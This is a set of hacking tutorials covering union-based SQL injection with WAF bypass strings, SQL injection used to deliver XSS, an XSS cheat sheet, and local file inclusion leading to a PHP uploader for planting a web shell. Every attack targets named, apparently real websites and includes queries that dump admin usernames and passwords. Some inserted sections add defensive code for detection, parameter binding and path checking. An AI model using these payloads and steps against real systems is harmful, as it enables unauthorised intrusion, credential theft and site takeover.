Union Based SQL Injection (WAF Bypassing) Tutorial By Mr.cyb3rwarrior_Ades


After Our Tutorial on Basics Of SQL Injection.
Union based SQL injection + WAF Bypassing By Adesh

Today I am going to discuss union-based SQL injection and WAF bypassing techniques.
Let's start injecting.
Target Site:http://radiozhakkasmarathi.in/full_review.php?id=3
Add Single Quote (') at the End Of The URL
http://radiozhakkasmarathi.in/full_review.php?id=3'



and get a MySQL error.
Let's balance our query for further injecting.
--

http://radiozhakkasmarathi.in/full_review.php?id=3--+

http://radiozhakkasmarathi.in/full_review.php?id=3-- -

http://radiozhakkasmarathi.in/full_review.php?id=3%23

http://radiozhakkasmarathi.in/full_review.php?id=3;

Here Is A Small Explanation on Balance and Comment in our Injection.



After balancing our query, the next step is to count the total number of columns.
http://radiozhakkasmarathi.in/full_review.php?id=3' order by 1-- -
No Error !
http://radiozhakkasmarathi.in/full_review.php?id=3' order by 3-- -
No Error!

http://radiozhakkasmarathi.in/full_review.php?id=3'  order by 6-- -
Again No Error !

http://radiozhakkasmarathi.in/full_review.php?id=3'  order by 7-- -
Here we get an error!

Now Try To Find Our Vulnerable Columns.
http://radiozhakkasmarathi.in/full_review.php?id=-3'  union select 1,2,3,4,5,6-- -



If our target site is protected by a WAF, the WAF will block our query and give us a Mod_Security error.
So here are some WAF bypassing methods.
    /*!%55NiOn*/ /*!%53eLEct*/
    %55nion(%53elect 1,2,3)-- -
    +union+distinct+select+
    +union+distinctROW+select+
    /**//*!12345UNION SELECT*//**/
    /**//*!50000UNION SELECT*//**/
    /**/UNION/**//*!50000SELECT*//**/
    /*!50000UniON SeLeCt*/
    union /*!50000%53elect*/
    +#uNiOn+#sEleCt
    +#1q%0AuNiOn all#qa%0A#%0AsEleCt
    /*!u%6eion*/ /*!se%6cect*/
    +un/**/ion+se/**/lect
    uni%0bon+se%0blect
    %2f**%2funion%2f**%2fselect
    union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
    REVERSE(noinu)+REVERSE(tceles)
    /*--*/union/*--*/select/*--*/
    union (/*!/**/ SeleCT */ 1,2,3)
    /*!union*/+/*!select*/
    union+/*!select*/
    /**/union/**/select/**/
    /**/uNIon/**/sEleCt/**/
    /**//*!union*//**//*!select*//**/
    /*!uNIOn*/ /*!SelECt*/
Just replace the union select with one of the bypass strings above.
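Why most of these strings get past a signature that looks for the literal text `union select`, and what a filter has to do before matching, as an added defensive example (not part of the original tutorial): decode the value the way the server will, unwrap MySQL's comment forms, then match. The function names and the benign sample are this example's own; the other samples are copied from the list above.

```python
import re
from urllib.parse import unquote_plus

# Bypass strings copied from the list above, plus one constructed benign value.
SAMPLES = [
    "/*!%55NiOn*/ /*!%53eLEct*/",
    "%55nion(%53elect 1,2,3)-- -",
    "+union+distinctROW+select+",
    "/**/UNION/**//*!50000SELECT*//**/",
    "/*!50000UniON SeLeCt*/",
    "+#1q%0AuNiOn all#qa%0A#%0AsEleCt",
    "+un/**/ion+se/**/lect",
    "uni%0bon+se%0blect",
    "%2f**%2funion%2f**%2fselect",
    "union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A",
    "union (/*!/**/ SeleCT */ 1,2,3)",
]
BENIGN = "latest union budget, select committee report"

NAIVE = re.compile(r"union\s+select", re.I)   # signature run on the raw request text
CANON = re.compile(r"\bunion\b(\s+(all|distinctrow|distinct))?[\s(]*\bselect\b")

def normalize(raw, joiner):
    """Decode a parameter value and remove what MySQL treats as non-code."""
    s = unquote_plus(raw)                             # %55 -> U, %0b -> VT, + -> space
    s = re.sub(r"/\*!\d*", " ", s)                    # /*!50000 ... */: MySQL can run the body, keep it
    s = re.sub(r"/\*.*?\*/", joiner, s, flags=re.S)   # ordinary /* ... */ comment
    s = s.replace("*/", " ")                          # closers left over from /*! ... */
    s = re.sub(r"#[^\n]*", " ", s)                    # '#' comment runs to end of line
    s = re.sub(r"[\x00-\x1f]", joiner, s)             # tab, LF, VT, CR used as separators
    return re.sub(r" +", " ", s).lower().strip()

def naive_hit(raw):
    return bool(NAIVE.search(raw))

def normalized_hit(raw):
    # A comment or control byte either separates tokens (MySQL's reading) or
    # disappears (a filter upstream strips it), so both readings are tested.
    return any(CANON.search(normalize(raw, j)) for j in (" ", ""))

def coverage(samples):
    """Return (hits by the raw signature, hits after normalization)."""
    return (sum(map(naive_hit, samples)), sum(map(normalized_hit, samples)))

if __name__ == "__main__":
    print(coverage(SAMPLES), normalized_hit(BENIGN))
```

Matching after normalization is a detection aid only; the injection itself is closed in the application by binding the parameter.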

Lets Continue Our Tutorial.
Here Are Some Vulnerable Columns Checking Methods With Examples.
Using And 0
http://www.targetsite.com/news.php?id=11 and 0 Union Select 1,2,3,4,5--+

Using And False
http://www.targetsite.com/news.php?id=11 and false Union Select 1,2,3,4,5--+

Using Div 0
http://www.targetsite.com/news.php?id=11 Div 0 Union Select 1,2,3,4,5--+

Using null
http://www.targetsite.com/news.php?id=null Union Select 1,2,3,4,5--+

Using .1337
http://www.targetsite.com/news.php?id=11.1337 Union Select 1,2,3,4,5--+


http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+

For our target we use:
/*!50000union */ and concat/*!50000()*/

http://radiozhakkasmarathi.in/full_review.php?id=-3'  /*!50000union */  select 1,2,3,4,5,6-- -

We will get our vulnerable columns printed on the page. 2 is our vulnerable column.


Here are some variables of MySQL.
@@version = Current Version
@@GLOBAL.VERSION = Current Version
User() = Current User
Database() = Current Database

For version:
http://radiozhakkasmarathi.in/full_review.php?id=-3'  /*!50000union */  select 1,@@version ,3,4,5,6-- -

We can see the current version printed on the page.
The next step is to get the tables.
We use a DIOS (dump in one shot) query for it:

http://radiozhakkasmarathi.in/full_review.php?id=3' and 0 /*!50000Union*/ Select 1,concat/*!50000(0x3c666f6e7420636f6c6f723d7265643e3c746974746c653e4d722e635962337277615272696f725f41646573686b6f6c74653c746974746c653e,0x3c6c693e,version(),0x3c6c693e,user(),0x3c6c693e,database(),make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@))*/,3,4,5,6-- -

Let's execute our DIOS query.



We can see all the tables in our primary database.
Now, if you want to get the admin details of the target site, check the table name of the admin,
then write the query.
Example:
http://radiozhakkasmarathi.in/full_review.php?id=3' and 0 /*!50000Union*/ Select 1,concat/*!50000(username,0x3a3a,password)*/,3,4,5,6 from site_user -- -



Enjoy :]
Tutorial By Adesh kolte
contact Us on FB
https://www.facebook.com/kolteAdesh


XSS via SQL Injection Tutorial, Part 2

Manipulating SQL Injection Queries in XSS Payload

If we go further, we can also show the results of our SQLi queries in an XSS pop-up alert. We will insert our SQLi queries into the XSS payload to show the SQL query output in a pop-up.
First, let's say we want to show the current version of the target site in an XSS pop-up. See the example:

Our XSS Payload for Showing Version in a POP-Up:

<img src=x onerror="javascript:alert('Your_name:Version:,version(),0x')">

The red highlighted text is our SQLi query, the blue text is the injector name, the green text is what we have put for our variable, and the rest is our XSS payload.
Before executing our query we need to encode our XSS payload as a hex value.
  
 Hex Value of XSS Payload:
0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827496e6a6563746564206279204d722e437962337277617272696f725f41646573687e3a56657273696f6e3a,version(),0x30782729223e
Let's insert our XSS Payload in the Vulnerable column for Showing the Pop-up for Current Version.

http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select  1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827496e6a6563746564206279204d722e437962337277617272696f725f41646573687e3a56657273696f6e3a,version(),0x30782729223e

),4,5,6,7,8,9--+
Let's Execute our Payload:

And here we got the current version in an XSS pop-up. We can do the same for the current database and user.
After popping up the version, the next part is showing the tables in an XSS pop-up alert. So we have to insert our query into the XSS payload to display them in the XSS alert.
Here is our DIOS query for getting the tables from the current database.

(select group_concat(table_name) from information_schema.tables where table_Schema=database())
Let's Add this DIOS Query in our XSS Payload .
http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select  1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827496e6a6563746564204279204d722e637962337277617272696f7241646573687e3a56657273696f6e3a,version(),(select group_concat(table_name) from information_schema.tables where table_Schema=database()),0x30782729223e),4,5,6,7,8,9--+

Now execute this query and check the output response:



We got the tables from the current database. If we go further, we might add HTML tags such as <BR> to start each table on a new line, but here this HTML doesn't work.
In XSS we use "\n", which shows each result on a new line. So we will add this part to our DIOS query to show each table on a new line in our XSS pop-up.

We need to first encode it as a hex value and then insert it into the DIOS query.

Hex value of \n: 0x5c6e

Let's Add it in our XSS Payload :
http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select  1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827496e6a6563746564204279204d722e637962337277617272696f7241646573687e3a56657273696f6e3a,version(),(select group_concat(0x5c6e,table_name) from information_schema.tables where table_Schema=database()),0x30782729223e),4,5,6,7,8,9--+

And here we can see all tables starting on a new line in the XSS pop-up alert box. We can do the same for columns by adding that part to our DIOS query. I leave that part for you guys.
Enjoy :]








XSS Using SQL Injection, Tutorial 1

In this tutorial you will learn the XSS attack via SQL injection.
If you are new to XSS, then I suggest you first read the basics in the previous tutorial to know how it works and what an attacker can do with an XSS vulnerability. Once you have basic knowledge about the XSS attack, you will be better able to understand this tutorial, "XSS with SQL Injection".
In the XSS attack via SQL injection we will execute our XSS payloads in a union-based query.


For Example:
We have found a website which is vulnerable to SQL injection and can inject into the database. But there we can also execute our XSS payloads in our union-based query. Let's take a site for practice.
Here is the target site:

http://www.lokmat.com/storypage.php?catid=31&newsid=3448

After counting, there are 9 columns in total. So let's prepare our union-based query and execute it.
http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select  1,2,3,4,5,6,7,8,9--+

There we see that the 3rd column is printed on the page as output, so we will execute our XSS payload in that column.
Here is the XSS payload that we are going to inject into the union-based query:

XSS PAYLOAD : <script>alert('Injected BY Mr.cyb3rwarrior-Adeshkolte');</script>
Before executing this payload we need to encode it as a hex value (use HackBar).

HexValue:0x3c7363726970743e616c6572742827496e6a6563746564204259204d722e637962337277617272696f722d41646573686b6f6c746527293b3c2f7363726970743e
Let's Insert this payload in our Union Based Query and Execute the query,

http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select  1,2,0x3c7363726970743e616c6572742827496e6a6563746564204259204d722e637962337277617272696f722d41646573686b6f6c746527293b3c2f7363726970743e,4,5,6,7,8,9--+
output
















This payload will display an XSS pop-up alert. This is the basic XSS payload; you can try more payloads, which will be posted in the next tutorial.
Enjoy
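Both the union-select steps and the XSS-in-a-column steps above depend on two habits in the page's code: the id is concatenated into the SQL string, and the selected column is written into the HTML unencoded. The following is an added example, not code from the tutorial or from either site, using Python's sqlite3 in place of PHP and MySQL; the table layout, rows, inputs and function names are constructed for illustration.

```python
import html
import sqlite3

NOT_FOUND = "<p>Not found</p>"
# Constructed inputs in the shape the tutorial uses, against this example's own tables.
UNION_INPUT = "-3' union select 1,username,password from site_user-- -"
SCRIPT_INPUT = "-3' union select 1,2,'<script>alert(1);</script>'-- -"

def make_db():
    """In-memory stand-in for the site's database, with constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE reviews (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.execute("INSERT INTO reviews VALUES (3, 'Morning show', 'Good <b>music</b>')")
    db.execute("CREATE TABLE site_user (username TEXT, password TEXT)")
    db.execute("INSERT INTO site_user VALUES ('admin', 'constructed-hash')")
    return db

def render(rows, encode):
    """Build the page body; encode() is applied to every database value."""
    return "".join("<h1>%s</h1><p>%s</p>" % (encode(str(r[1])), encode(str(r[2])))
                   for r in rows) or NOT_FOUND

def page_vulnerable(db, raw_id):
    # Request text becomes SQL text, and query output becomes HTML text.
    sql = "SELECT id, title, body FROM reviews WHERE id='%s'" % raw_id
    return render(db.execute(sql).fetchall(), lambda s: s)

def page_hardened(db, raw_id):
    # 1. The id must be a short, plain decimal number.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return NOT_FOUND
    # 2. The value travels as a bound parameter, never as part of the statement.
    rows = db.execute("SELECT id, title, body FROM reviews WHERE id = ?",
                      (int(raw_id),)).fetchall()
    # 3. Whatever the database returns is HTML-encoded on output.
    return render(rows, html.escape)

if __name__ == "__main__":
    db = make_db()
    for value in ("3", UNION_INPUT, SCRIPT_INPUT):
        print(repr(value), "->", page_hardened(db, value))
```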


XSS Cheat Sheet:

This vulnerability occurs due to poorly developed application code. An attacker is able to inject his malicious HTML code through client web browsers.
Mostly, the whole XSS attack is based on JavaScript and HTML for executing malicious code on the target website. Once an attacker is able to run his code with JavaScript on the site, that JavaScript will be executed when a user comes to the site and clicks on the malicious link. Mostly, people do XSS and show a pop-up with their name to advertise themselves.
XSS can be used for phishing as well as stealing accounts, or we can do some social engineering with XSS.
XSS Cheat Sheet:
<script>alert(1);</script>
<script>alert('XSS');</script>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=javascript:alert('XSS')>
<scr<script>ipt>alert('XSS');</scr</script>ipt>
'><script>alert(0)</script>
<img src=foo.png onerror=alert(/xssed/) />
<style>@import'ja asc
ipt:alert("XSS")';</style>
<? echo('<scr)'; echo('ipt>alert("XSS")</script>'); ?>
<marquee><script>alert('XSS')</script></marquee>
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<script src=http://yoursite.com/your_files.js></script>
</title><script>alert(/xss/)</script>
<IMG DYNSRC="javascript:alert('XSS')">
<img src=javascript:alert('XSS')>
<script language=JavaScript>alert('XSS')</script>
<body onunload=javascript:alert('XSS');>
<body onLoad='alert('XSS');'
[color=red' onmouseover='alert('xss')']mouse over[/color]
'/></a></><img src=1.gif onerror=alert(1)>
window.alert('Bonjour !');
<div style='x:expression((window.r==1)?'':eval('r=1;
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
'>><marquee><h1>XSS</h1></marquee>

Shell uploading Using LFI by Mr.Cyb3rWarrior (ADesh kolte)





Today I show how to hack a website using LFI:- Please do not deface this.

               Target Site:- http://www.clginstitute.org

Step:1 Find The LFI Target Point On This Website:-

Target LFI Point:-

http://www.clginstitute.org/?content=newsandevent.php



Step:2 Now remove all text after (./?content=). The URL now looks like this:-

http://www.clginstitute.org/?content=



Step:3 Put a forward slash (/) after (./?content=). The URL now looks like this:-

http://www.clginstitute.org/?content=/

If you get any error after putting the (/), then the chance of it being vulnerable to LFI is 80%. If you see that data is hidden on the website, then the chance of it being vulnerable to LFI is 50-50%.

Here is the error I got on the website after putting (/):



Warning: include(/): failed to open stream: No such device in /home/clginsti/public_html/callpage.php on line 9



Warning: include(): Failed opening '/' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/clginsti/public_html/callpage.php on line 9











Step:4 Put /proc/self/environ after (./?content=). The URL now looks like this:-

 http://www.clginstitute.org/?content=/proc/self/environ

After putting /proc/self/environ, you see some session request data on the website. That means we are able to upload our shell.





Step:5 Open Tamper Data (Mozilla add-on), start tampering the data and refresh the target URL:-



Step:6 Put your uploader code in Tamper Data in the User_code or Accept field. I put my uploader code in Accept.

Then submit the request.

Uploader code:-







<?php

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';

if( $_POST['_upl'] == "Upload" ) {

    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }

    else { echo '<b>Upload GAGAL !!!</b><br><br>'; }

}

?>



Step:7 Now you see our uploader on the website. Upload your shell here and submit your request in Tamper Data.

Step:8 Now again put your uploader code in Accept, using Tamper Data during the shell upload.

Step:9 Your shell is uploaded to the server. Check it now.



Thanks for seeing my tutorials. Please post your positive comment if you learned something new.

And also post your web hacking tutorials in the forum.

BY Mr.Cyb3rWarrior (Adesh kolte)
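The warning in Step 3 shows callpage.php handing the content parameter directly to include(). An added example of the check that closes this, written in Python so it runs stand-alone (it is not the site's code; resolve_page, Rejected and the directory layout are hypothetical): accept only a bare file name that resolves to a regular file inside the pages directory.

```python
import os
import tempfile

class Rejected(ValueError):
    """The requested page name must not be passed to include()."""

def resolve_page(pages_dir, requested):
    """Map a ?content= value to a file that really lives under pages_dir."""
    base = os.path.realpath(pages_dir)
    # A bare file name only: rejects "", "/", "/proc/self/environ", "../x".
    if not requested or requested != os.path.basename(requested):
        raise Rejected("path separators are not allowed")
    # Resolve symlinks and ".." before comparing against the base directory.
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        raise Rejected("resolves outside the pages directory")
    if not os.path.isfile(candidate):
        raise Rejected("no such page")
    return candidate

def demo():
    """Run the check over constructed request values in a temporary tree."""
    root = tempfile.mkdtemp()
    pages = os.path.join(root, "pages")
    os.mkdir(pages)
    open(os.path.join(pages, "newsandevent.php"), "w").close()
    outside = os.path.join(root, "secret.txt")
    open(outside, "w").close()
    os.symlink(outside, os.path.join(pages, "link.php"))   # symlink leaving pages/
    results = {}
    for value in ("newsandevent.php", "/", "/proc/self/environ",
                  "../secret.txt", "..", "link.php", "missing.php"):
        try:
            resolve_page(pages, value)
            results[value] = "served"
        except Rejected as exc:
            results[value] = "rejected: %s" % exc
    return results

if __name__ == "__main__":
    for value, outcome in demo().items():
        print("%-22s %s" % (value, outcome))
```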